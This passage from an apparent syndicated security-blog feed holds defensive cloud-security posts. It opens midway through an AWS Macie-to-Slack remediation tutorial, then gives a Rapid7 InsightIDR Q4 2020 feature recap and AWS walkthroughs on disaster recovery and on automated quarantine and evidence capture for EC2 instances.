  1. Open Slack and return to the Basic Information page for the Slack app you created earlier.
  2. Under Add features and functionality, select the Interactive Components tile.
  3. Turn on the Interactivity setting.
  4. In the Request URL box, enter the API Gateway endpoint URL you copied earlier.
  5. Choose Save Changes.

    Figure 7: Slack app interactivity

    Figure 7: Slack app interactivity

Now that you have the solution components deployed and Slack configured, it’s time to test things out.

Test the solution

The testing steps can be summarized as follows:

  1. Upload dummy files to S3
  2. Run the Macie sensitive data discovery job
  3. Review and act upon Slack notifications
  4. Confirm that S3 objects are quarantined

To upload dummy files to S3

Two sample text files containing dummy financial and personal data are available in the project you cloned from GitHub. If you haven’t changed the default auto-remediation configurations, these two files will exercise both the auto-remediation and manual remediation review flows.

Find the files under sensitive-data-samples/dummy-financial-data.txt and sensitive-data-samples/dummy-personal-data.txt. Take these two files and upload them to S3 by using either the console, as shown in Figure 8, or AWS CLI. You can choose to use any new or existing bucket, but make sure that the bucket is in the same AWS account and Region that was used to deploy the solution.

Figure 8: Dummy files uploaded to S3

Figure 8: Dummy files uploaded to S3

To run a Macie sensitive data discovery job

  1. Navigate to the Amazon Macie console, and make sure that your selected Region is the same as the one that was used to deploy the solution.
    1. If this is your first time using Macie, choose the Get Started button, and then choose Enable Macie.
  2. On the Macie Summary dashboard, you will see a Create Job button at the top right. Choose this button to launch the Job creation wizard. Configure each step as follows:
    1. Select S3 buckets: Select the bucket where you uploaded the dummy sensitive data file. Choose Next.
    2. Review S3 buckets: No changes are required, choose Next.
    3. Scope: For Job type, choose One-time job. Make sure Sampling depth is set to 100%. Choose Next.
    4. Custom data identifiers: No changes are required, choose Next.
    5. Name and description: For Job name, enter any name you like, such as Dummy job, and then choose Next.
    6. Review and create: Review your settings; they should look like the following sample. Choose Submit.
Figure 9: Configure the Macie sensitive data discovery job

Figure 9: Configure the Macie sensitive data discovery job

Macie will launch the sensitive data discovery job. You can track its status from the Jobs page within the Macie console.

To review and take action on Slack notifications

Within five minutes of submitting the data discovery job, you should expect to see two notifications appear in your configured Slack channel. One notification, similar to the one in Figure 10, is informational only and is related to an auto-remediation action that has taken place.

Figure 10: Slack notification of auto-remediation for the file containing dummy financial data

Figure 10: Slack notification of auto-remediation for the file containing dummy financial data

The other notification, similar to the one in Figure 11, requires end user action and is for a finding that requires administrator review. All notifications will display key information such as the offending S3 object, a description of the finding, the finding severity, and other relevant metadata.

Figure 11: Slack notification for human review of the file containing dummy personal data

Figure 11: Slack notification for human review of the file containing dummy personal data

(Optional) You can review the finding details by choosing the View Macie Finding in Console link in the notification.

In the Slack notification, choose the Remediate button to quarantine the object. The notification will be updated with confirmation of the quarantine action, as shown in Figure 12.

Figure 12: Slack notification of authorized remediation

Figure 12: Slack notification of authorized remediation

To confirm that S3 objects are quarantined

Finally, navigate to the S3 console and validate that the objects have been removed from their original bucket and placed into the quarantine bucket listed in the notification details, as shown in Figure 13. Note that you may need to refresh your S3 object listing in the browser.

Figure 13: Slack notification of authorized remediation

Figure 13: Slack notification of authorized remediation

Congratulations! You now have a fully operational solution to detect and respond to Macie sensitive data findings through a Slack ChatOps workflow.

Solution cleanup

To remove the solution and avoid incurring additional charges from the AWS resources that you deployed, complete the following steps.

To remove the solution and associated resources

  1. Navigate to the Macie console. Under Settings, choose Suspend Macie.
  2. Navigate to the S3 console and delete all objects in the quarantine bucket.
  3. Run the command cdk destroy from the command line within the root directory of the project. You will be prompted to confirm that you want to remove the solution. Press y.

Summary

In this blog post, I showed you how to integrate Amazon Macie sensitive data findings with an auto-remediation and Slack ChatOps workflow. We reviewed the AWS services used, how they are integrated, and the steps to configure, deploy, and test the solution. With Macie and the solution in this blog post, you can substantially reduce the heavy lifting associated with detecting and responding to sensitive data in your AWS environment.

I encourage you to take this solution and customize it to your needs. Further enhancements could include supporting policy findings, adding additional remediation actions, or integrating with additional findings from AWS Security Hub.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on the Amazon Macie forum or contact AWS Support.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Nick Cuneo

Nick is an Enterprise Solutions Architect at AWS who works closely with Australia’s largest financial services organisations. His previous roles span operations, software engineering, and design. Nick is passionate about application and network security, automation, microservices, and event driven architectures. Outside of work, he enjoys motorsport and is found most weekends in his garage wrenching on cars.

What’s New in InsightIDR: Q4 2020 in Review

Post Syndicated from Margaret Zonay original https://blog.rapid7.com/2020/12/18/whats-new-in-insightidr-q4-2020-in-review/

What’s New in InsightIDR: Q4 2020 in Review

Throughout the year, we’ve provided roundups of what’s new in InsightIDR, our cloud-based SIEM tool (see the H1 recap post, and our most recent Q3 2020 recap post). As we near the end of 2020, we wanted to offer a closer look at some of the recent updates and releases in InsightIDR from Q4 2020.

Complete endpoint visibility with enhanced endpoint telemetry (EET)

With the addition of the enhanced endpoint telemetry (EET) add-on module, InsightIDR customers now have the ability to access all process start activity data (aka any events captured when an application, service, or other process starts on an endpoint) in InsightIDR’s log search. This data provides a full picture of endpoint activity, enabling customers to create custom detections, see the full scope of an attack, and effectively detect and respond to incidents. Read more about this new add-on in our blog here, and see our on-demand demo below.

Network Traffic Analysis: Insight Network Sensor for AWS now in general availability

In our last quarterly recap, we introduced our early access period for the Insight Network Sensor for AWS, and today we’re excited to announce its general availability. Now, all InsightIDR customers can deploy a network sensor on their AWS Virtual Private Cloud and configure it to communicate with InsightIDR. This new sensor generates the same data outputs as the existing Insight Network Sensor, and its ability to deploy in AWS cloud environments opens up a whole new way for customers to gain insight into what is happening within their cloud estates. For more details, check out the requirements here.

What’s New in InsightIDR: Q4 2020 in Review

New Attacker Behavior Analytics (ABA) threats

Our threat intelligence and detection engineering (TIDE) team and SOC experts are constantly updating our detections as they discover new threats. Most recently, our team added 86 new Attacker Behavior Analytics (ABA) threats within InsightIDR. Each of these threats is a collection of three rules looking for one of 38,535 specific Indicators of Compromise (IoCs) known to be associated with a malicious actor’s various aliases.  

In total, we have 258 new rules, or three for each type of threat. The new rule types for each threat are as follows:

  • Suspicious DNS Request – <Malicious Actor Name> Related Domain Observed
  • Suspicious Web Request – <Malicious Actor Name> Related Domain Observed
  • Suspicious Process – <Malicious Actor Name> Related Binary Executed

New InsightIDR detections for activity related to recent SolarWinds Orion attack: The Rapid7 Threat Detection & Response team has compared publicly available indicators against our existing detections, deployed new detections, and updated our existing detection rules as needed. We also published in-product queries so that customers can quickly determine whether activity related to the breaches has occurred within their environment. Rapid7 is closely monitoring the situation, and will continue to update our detections and guidance as more information becomes available. See our recent blog post for additional details.

Custom Parser editing

InsightIDR customers leveraging our Custom Parsing Tool can now edit fields in their pre-existing parsers. With this new addition, you can update the parser name, extract additional fields, and edit existing extracted fields. For detailed information on our Custom Parsing Tool capabilities, check out our help documentation here.

What’s New in InsightIDR: Q4 2020 in Review

Record user-driven and automated activity with Audit Logging

Available to all InsightIDR customers, our new Audit Logging service is now in Open Preview. Audit logging enables you to track user driven and automated activity in InsightIDR and across Rapid7’s Insight Platform, so you can investigate who did what, when. Audit Logging will also help you fulfill compliance requirements if these details are requested by an external auditor. Learn more about the Audit Logging Open Preview in our help docs here, and see step-by-step instructions for how to turn it on here.

What’s New in InsightIDR: Q4 2020 in Review

New event source integrations: Cybereason, Sophos Intercept X, and DivvyCloud by Rapid7

With our recent event source integrations with Cybereason and Sophos Intercept X, InsightIDR customers can spend less time jumping in and out of multiple endpoint protection tools and more time focusing on investigating and remediating attacks within InsightIDR.

  • Cybereason: Cybereason’s Endpoint Detection and Response (EDR) platform detects events that signal malicious operations (Malops), which can now be fed as an event source to InsightIDR. With this new integration, every time an alert fires in Cybereason, it will get relayed to InsightIDR. Read more in our recent blog post here.
  • Sophos Intercept X: Sophos Intercept X is an endpoint protection tool used to detect malware and viruses in your environment. InsightIDR features a Sophos Intercept X event source that you can configure to parse alert types as Virus Alert events. Check out our help documentation here.
  • DivvyCloud: This past spring, Rapid7 acquired DivvyCloud, a leader in Cloud Security Posture Management (CSPM) that provides real-time analysis and automated remediation for cloud and container technologies. Now, we’re excited to announce a custom log integration where cloud events from DivvyCloud can be sent to InsightIDR for analysis, investigations, reporting, and more. Check out our help documentation here.

Stay tuned for more!

As always, we’re continuing to work on exciting product enhancements and releases throughout the year. Keep an eye on our blog and release notes as we continue to highlight the latest in detection and response at Rapid7.

Not an InsightIDR customer? Start a free trial today.

Get Started

Integrating CloudEndure Disaster Recovery into your security incident response plan

Post Syndicated from Gonen Stein original https://aws.amazon.com/blogs/security/integrating-cloudendure-disaster-recovery-into-your-security-incident-response-plan/

An incident response plan (also known as procedure) contains the detailed actions an organization takes to prepare for a security incident in its IT environment. It also includes the mechanisms to detect, analyze, contain, eradicate, and recover from a security incident. Every incident response plan should contain a section on recovery, which outlines scenarios ranging from single component to full environment recovery. This recovery section should include disaster recovery (DR), with procedures to recover your environment from complete failure. Effective recovery from an IT disaster requires tools that can automate preparation, testing, and recovery processes. In this post, I explain how to integrate CloudEndure Disaster Recovery into the recovery section of your incident response plan. CloudEndure Disaster Recovery is an Amazon Web Services (AWS) DR solution that enables fast, reliable recovery of physical, virtual, and cloud-based servers on AWS. This post also discusses how you can use CloudEndure Disaster Recovery to reduce downtime and data loss when responding to a security incident, and best practices for maintaining your incident response plan.

How disaster recovery fits into a security incident response plan

The AWS Well-Architected Framework security pillar provides guidance to help you apply best practices and current recommendations in the design, delivery, and maintenance of secure AWS workloads. It includes a recommendation to integrate tools to secure and protect your data. A secure data replication and recovery tool helps you protect your data if there’s a security incident and quickly return to normal business operation as you resolve the incident. The recovery section of your incident response plan should define recovery point objectives (RPOs) and recovery time objectives (RTOs) for your DR-protected workloads. RPO is the window of time that data loss can be tolerated due to a disruption. RTO is the amount of time permitted to recover workloads after a disruption.

Your DR response to a security incident can vary based on the type of incident you encounter. For example, your DR plan for responding to a security incident such as ransomware—which involves data corruption—should describe how to recover workloads on your secondary DR site using a recovery point prior to the data corruption. This use case will be discussed further in the next section.

In addition to tools and processes, your security incident response plan should define the roles and responsibilities necessary during an incident. This includes the people and roles in your organization who perform incident mitigation steps, in addition to those who need to be informed and consulted. This can include technology partners, application owners, or subject matter experts (SMEs) outside of your organization who can offer additional expertise. DR-related roles for your incident response plan include:

  • A person who analyzes the situation and provides visibility to decision-makers.
  • A person who decides whether or not to trigger a DR response.
  • A person who actively triggers the DR response.

Be sure to include all of the stakeholders you identify in your documented security incident response procedures and runbooks. Test your plan to verify that the people in these roles have the pre-provisioned access they need to perform their defined role.

How to use CloudEndure Disaster Recovery during a security incident

CloudEndure Disaster Recovery continuously replicates your servers—including OS, system state configuration, databases, applications, and files—to a staging area in your target AWS Region. The staging area contains low-cost resources automatically provisioned and managed by CloudEndure Disaster Recovery. This reduces the cost of provisioning duplicate resources during normal operation. Your fully provisioned recovery environment is launched only during an incident or drill.

If your organization experiences a security incident that can be remediated using DR, you can use CloudEndure Disaster Recovery to perform failover to your target AWS Region from your source environment. When you perform failover, CloudEndure Disaster Recovery orchestrates the recovery of your environment in your target AWS Region. This enables quick recovery, with RPOs of seconds and RTOs of minutes.

To deploy CloudEndure Disaster Recovery, you must first install the CloudEndure agent on the servers in your environment that you want to replicate for DR, and then initiate data replication to your target AWS Region. Once data replication is complete and your data is in sync, you can launch machines in your target AWS Region from the CloudEndure User Console. CloudEndure Disaster Recovery enables you to launch target machines in either Test Mode or Recovery Mode. Your launched machines behave the same way in either mode; the only difference is how the machine lifecycle is displayed in the CloudEndure User Console. Launch machines by opening the Machines page, shown in the following figure, and selecting the machines you want to launch. Then select either Test Mode or Recovery Mode from the Launch Target Machines menu.
 

Figure 1: Machines page on the CloudEndure User Console

Figure 1: Machines page on the CloudEndure User Console

You can launch your entire environment, a group of servers comprising one or more applications, or a single server in your target AWS Region. When you launch machines from the CloudEndure User Console, you’re prompted to choose a recovery point from the Choose Recovery Point dialog box (shown in the following figure).

Use point-in-time recovery to respond to security incidents that involve data corruption, such as ransomware. Your incident response plan should include a mechanism to determine when data corruption occurred. Knowing how to determine which recovery point to choose in the CloudEndure User Console helps you minimize response time during a security incident. Each recovery point is a point-in-time snapshot of your servers that you can use to launch recovery machines in your target AWS Region. Select the latest recovery point before the data corruption to restore your workloads on AWS, and then choose Continue With Launch.
 

Figure 2: Selection of an earlier recovery point from the Choose Recovery Point dialog box

Figure 2: Selection of an earlier recovery point from the Choose Recovery Point dialog box

Run your recovered workloads in your target AWS Region until you’ve resolved the security incident. When the incident is resolved, you can perform failback to your primary environment using CloudEndure Disaster Recovery. You can learn more about CloudEndure Disaster Recovery setup, operation, and recovery by taking this online CloudEndure Disaster Recovery Technical Training.

Test and maintain the recovery section of your incident response plan

Your entire incident response plan must be kept accurate and up to date in order to effectively remediate security incidents if they occur. A best practice for achieving this is through frequently testing all sections of your plan, including your tools. When you first deploy CloudEndure Disaster Recovery, begin running tests as soon as all of your replicated servers are in sync on your target AWS Region. DR solution implementation is generally considered complete when all initial testing has succeeded.

By correctly configuring the networking and security groups in your target AWS Region, you can use CloudEndure Disaster Recovery to launch a test workload in an isolated environment without impacting your source environment. You can run tests as often as you want. Tests don’t incur additional fees beyond payment for the fully provisioned resources generated during tests.

Testing involves two main components: launching the machines you wish to test on AWS, and performing user acceptance testing (UAT) on the launched machines.

  1. Launch machines to test.
     
    Select the machines to test from the Machines page of the CloudEndure User Console by selecting the check box next to the machine. Then choose Test Mode from the Launch Target Machines menu, as shown in the following figure. You can select the latest recovery point or an earlier recovery point.
     
    Figure 3: Select Test Mode to launch selected machines

    Figure 3: Select Test Mode to launch selected machines

     

    The following figure shows the CloudEndure User Console. The Disaster Recovery Lifecycle column shows that the machines have been Tested Recently.

    Figure 4: Machines launched in Test Mode display purple icons in the Status column and Tested Recently in the Disaster Recovery Lifecycle column

    Figure 4: Machines launched in Test Mode display purple icons in the Status column and Tested Recently in the Disaster Recovery Lifecycle column

  2. Perform UAT testing.
     
    Begin UAT testing when the machine launch job is successfully completed and your target machines have booted.

After you’ve successfully deployed, configured, and tested CloudEndure Disaster Recovery on your source environment, add it to your ongoing change management processes so that your incident response plan remains accurate and up-to-date. This includes deploying and testing CloudEndure Disaster Recovery every time you add new servers to your environment. In addition, monitor for changes to your existing resources and make corresponding changes to your CloudEndure Disaster Recovery configuration if necessary.

How CloudEndure Disaster Recovery keeps your data secure

CloudEndure Disaster Recovery has multiple mechanisms to keep your data secure and not introduce new security risks. Data replication is performed using AES 256-bit encryption in transit. Data at rest can be encrypted by using Amazon Elastic Block Store (Amazon EBS) encryption with an AWS managed key or a customer key. Amazon EBS encryption is supported by all volume types, and includes built-in key management infrastructure that has no performance impact. Replication traffic is transmitted directly from your source servers to your target AWS Region, and can be restricted to private connectivity such as AWS Direct Connect or a VPN. CloudEndure Disaster Recovery is ISO 27001 and GDPR compliant and HIPAA eligible.

Summary

Each organization tailors its incident response plan to meet its unique security requirements. As described in this post, you can use CloudEndure Disaster Recovery to improve your organization’s incident response plan. I also explained how to recover from an earlier point in time when you respond to security incidents involving data corruption, and how to test your servers as part of maintaining the DR section of your incident response plan. By following the guidance in this post, you can improve your IT resilience and recover more quickly from security incidents. You can also reduce your DR operational costs by avoiding duplicate provisioning of your DR infrastructure.

Visit the CloudEndure Disaster Recovery product page if you would like to learn more. You can also view the AWS Raise the Bar on Data Protection and Security webinar series for additional information on how to protect your data and improve IT resilience on AWS.

If you have feedback about this post, submit comments in the Comments section below.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Gonen Stein

Gonen is the Head of Product Strategy for CloudEndure, an AWS company. He combines his expertise in business, cloud infrastructure, storage, and information security to assist enterprise organizations with developing and deploying IT resilience and business continuity strategies in the cloud.

How to automate incident response in the AWS Cloud for EC2 instances

Post Syndicated from Ben Eichorst original https://aws.amazon.com/blogs/security/how-to-automate-incident-response-in-aws-cloud-for-ec2-instances/

One of the security epics core to the AWS Cloud Adoption Framework (AWS CAF) is a focus on incident response and preparedness to address unauthorized activity. Multiple methods exist in Amazon Web Services (AWS) for automating classic incident response techniques, and the AWS Security Incident Response Guide outlines many of these methods. This post demonstrates one specific method for instantaneous response and acquisition of infrastructure data from Amazon Elastic Compute Cloud (Amazon EC2) instances.

Incident response starts with detection, progresses to investigation, and then follows with remediation. This process is no different in AWS. AWS services such as Amazon GuardDuty, Amazon Macie, and Amazon Inspector provide detection capabilities. Amazon Detective assists with investigation, including tracking and gathering information. Then, after your security organization decides to take action, pre-planned and pre-provisioned runbooks enable faster action towards a resolution. One principle outlined in the incident response whitepaper and the AWS Well-Architected Framework is the notion of pre-provisioning systems and policies to allow you to react quickly to an incident response event. The solution I present here provides a pre-provisioned architecture for an incident response system that you can use to respond to a suspect EC2 instance.

Infrastructure overview

The architecture that I outline in this blog post automates these standard actions on a suspect compute instance:

  1. Capture all the persistent disks.
  2. Capture the instance state at the time the incident response mechanism is started.
  3. Isolate the instance and protect against accidental instance termination.
  4. Perform operating system–level information gathering, such as memory captures and other parameters.
  5. Notify the administrator of these actions.

The solution in this blog post accomplishes these tasks through the following logical flow of AWS services, illustrated in Figure 1.
 

Figure 1: Infrastructure deployed by the accompanying AWS CloudFormation template and associated task flow when invoking the main API

Figure 1: Infrastructure deployed by the accompanying AWS CloudFormation template and associated task flow when invoking the main API

  1. A user or application calls an API with an EC2 instance ID to start data collection.
  2. Amazon API Gateway initiates the core logic of the process by instantiating an AWS Lambda function.
  3. The Lambda function performs the following data gathering steps before making any changes to the infrastructure:
    1. Save instance metadata to the SecResponse Amazon Simple Storage Service (Amazon S3) bucket.
    2. Save a snapshot of the instance console to the SecResponse S3 bucket.
    3. Initiate an Amazon Elastic Block Store (Amazon EBS) snapshot of all persistent block storage volumes.
  4. The Lambda function then modifies the infrastructure to continue gathering information, by doing the following steps:
    1. Set the Amazon EC2 termination protection flag on the instance.
    2. Remove any existing EC2 instance profile from the instance.
    3. If the instance is managed by AWS Systems Manager:
      1. Attach an EC2 instance profile with minimal privileges for operating system–level information gathering.
      2. Perform operating system–level information gathering actions through Systems Manager on the EC2 instance.
      3. Remove the instance profile after Systems Manager has completed its actions.
    4. Create a quarantine security group that lacks both ingress and egress rules.
    5. Move the instance into the created quarantine security group for isolation.
  5. Send an administrative notification through the configured Amazon Simple Notification Service (Amazon SNS) topic.

Solution features

By using the mechanisms outlined in this post to codify your incident response runbooks, you can see the following benefits to your incident response plan.

Preparation for incident response before an incident occurs

Both the AWS CAF and Well-Architected Framework recommend that customers formulate known procedures for incident response, and test those runbooks before an incident. Testing these processes before an event occurs decreases the time it takes you to respond in a production environment. The sample infrastructure shown in this post demonstrates how you can standardize those procedures.

Consistent incident response artifact gathering

Codifying your processes into set code and infrastructure prepares you for the need to collect data, but also standardizes the collection process into a repeatable and auditable sequence of What information was collected when and how. This reduces the likelihood of missing data for future investigations.

Walkthrough: Deploying infrastructure and starting the process

To implement the solution outlined in this post, you first need to deploy the infrastructure, and then start the data collection process by issuing an API call.

The code example in this blog post requires that you provision an AWS CloudFormation stack, which creates an S3 bucket for storing your event artifacts and a serverless API that uses API Gateway and Lambda. You then execute a query against this API to take action on a target EC2 instance.

The infrastructure deployed by the AWS CloudFormation stack is a set of AWS components as depicted previously in Figure 1. The stack includes all the services and configurations to deploy the demo. It doesn’t include a target EC2 instance that you can use to test the mechanism used in this post.

Cost

The cost for this demo is minimal because the base infrastructure is completely serverless. With AWS, you only pay for the infrastructure that you use, so the single API call issued in this demo costs fractions of a cent. Artifact storage costs will incur S3 storage prices, and Amazon EC2 snapshots will be stored at their respective prices.

Deploy the AWS CloudFormation stack

In future posts and updates, we will show how to set up this security response mechanism inside a separate account designated for security, but for the purposes of this post, your demo stack must reside in the same AWS account as the target instance that you set up in the next section.

First, start by deploying the AWS CloudFormation template to provision the infrastructure.

To deploy this template in the us-east-1 region

  1. Choose the Launch Stack button to open the AWS CloudFormation console pre-loaded with the template:
     
    Select the Launch Stack button to launch the template
  2. (Optional) In the AWS CloudFormation console, on the Specify Details page, customize the stack name.
  3. For the LambdaS3BucketLocation and LambdaZipFileName fields, leave the default values for the purposes of this blog. Customizing this field allows you to customize this code example for your own purposes and store it in an S3 bucket of your choosing.
  4. Customize the S3BucketName field. This needs to be a globally unique S3 bucket name. This bucket is where gathered artifacts are stored for the demo in this blog. You must customize it beyond the default value for the template to instantiate properly.
  5. (Optional) Customize the SNSTopicName field. This name provides a meaningful label for the SNS topic that notifies the administrator of the actions that were performed.
  6. Choose Next to configure the stack options and leave all default settings in place.
  7. Choose Next to review and scroll to the bottom of the page. Select all three check boxes under the Capabilities and Transforms section, next to each of the three acknowledgements:
    • I acknowledge that AWS CloudFormation might create IAM resources.
    • I acknowledge that AWS CloudFormation might create IAM resources with custom names.
    • I acknowledge that AWS CloudFormation might require the following capability: CAPABILITY_AUTO_EXPAND.
  8. Choose Create Stack.

Set up a target EC2 instance

In order to demonstrate the functionality of this mechanism, you need a target host. Provision any EC2 instance in your account to act as a target for the security response mechanism to act upon for information collection and quarantine. To optimize affordability and demonstrate full functionality, I recommend choosing a small instance size (for example, t2.nano) and optionally joining the instance into Systems Manager for the ability to later execute Run Command API queries. For more details on configuring Systems Manager, refer to the AWS Systems Manager User Guide.

Retrieve required information for system initiation

The entire security response mechanism triggers through an API call. To successfully initiate this call, you first need to gather the API URI and key information.

To find the API URI and key information

  1. Navigate to the AWS CloudFormation console and choose the stack that you’ve instantiated.
  2. Choose the Outputs tab and save the value for the key APIBaseURI. This is the base URI for the API Gateway. It will resemble https://abcdefgh12.execute-api.us-east-1.amazonaws.com.
  3. Next, navigate to the API Gateway console and choose the API with the name SecurityResponse.
  4. Choose API Keys, and then choose the only key present.
  5. Next to the API key field, choose Show to reveal the key, and then save this value to a notepad for later use.

(Optional) Configure administrative notification through the created SNS topic

One aspect of this mechanism is that it sends notifications through SNS topics. You can optionally subscribe your email or another notification pipeline mechanism to the created SNS topic in order to receive notifications on actions taken by the system.

Initiate the security response mechanism

Note that, in this demo code, you’re using a simple API key for limiting access to API Gateway. In production applications, you would use an authentication mechanism such as Amazon Cognito to control access to your API.

To kick off the security response mechanism, initiate a REST API query against the API that was created in the AWS CloudFormation template. You first create this API call by using a curl command to be run from a Linux system.

To create the API initiation curl command

  1. Copy the following example curl command.
    curl -v -X POST -i -H "x-api-key: 012345ABCDefGHIjkLMS20tGRJ7othuyag" https://abcdefghi.execute-api.us-east-1.amazonaws.com/DEMO/secresponse -d '{
      "instance_id":"i-123457890"
    }'
    

  2. Replace the placeholder API key specified in the x-api-key HTTP header with your API key.
  3. Replace the example URI path with your API’s specific URI. To create the full URI, concatenate the base URI listed in the AWS CloudFormation output you gathered previously with the API call path, which is /DEMO/secresponse. This full URI for your specific API call should closely resemble this sample URI path: https://abcdefghi.execute-api.us-east-1.amazonaws.com/DEMO/secresponse
  4. Replace the value associated with the key instance_id with the instance ID of the target EC2 instance you created.

Because this mechanism initiates through a simple API call, you can easily integrate it with existing workflow management systems. This allows for complex data collection and forensic procedures to be integrated with existing incident response workflows.

Review the gathered data

Note that the following items were uploaded as objects in the security response S3 bucket:

  1. A console screenshot, as shown in Figure 2.
  2. (If Systems Manager is configured) stdout information from the commands that were run on the host operating system.
  3. Instance metadata in JSON form.

 

Figure 2: Example outputs from a successful completion of this blog post's mechanism

Figure 2: Example outputs from a successful completion of this blog post’s mechanism

Additionally, if you load the Amazon EC2 console and scroll down to Elastic Block Store, you can see that EBS snapshots are present for all persistent disks as shown in Figure 3.
 

Figure 3: Evidence of an EBS snapshot from a successful run

Figure 3: Evidence of an EBS snapshot from a successful run

You can also verify that the previously outlined security controls are in place by viewing the instance in the Amazon EC2 console. You should see the removal of AWS Identity and Access Management (IAM) roles from the target EC2 instances and that the instance has been placed into network isolation through a newly created quarantine security group.

Note that for the purposes of this demo, all information that you gathered is stored in the same AWS account as the workload. As a best practice, many AWS customers choose instead to store this information in an AWS account that’s specifically designated for incident response and analysis. A dedicated account provides clear isolation of function and restriction of access. Using AWS Organizations service control policies (SCPs) and IAM permissions, your security team can limit access to adhere to security policy, legal guidance, and compliance regulations.

Clean up and delete artifacts

To clean up the artifacts from the solution in this post, first delete all information in your security response S3 bucket. Then delete the CloudFormation stack that was provisioned at the start of this process in order to clean up all remaining infrastructure.

Conclusion

Placing workloads in the AWS Cloud allows for pre-provisioned and explicitly defined incident response runbooks to be codified and quickly executed on suspect EC2 instances. This enables you to gather data in minutes that previously took hours or even days using manual processes.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on the Amazon EC2 forum or contact AWS Support.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Ben Eichorst

Ben is a Senior Solutions Architect, Security, Cryptography, and Identity Specialist for AWS. He works with AWS customers to efficiently implement globally scalable security programs while empowering development teams and reducing risk. He holds a BA from Northwestern University and an MBA from University of Colorado.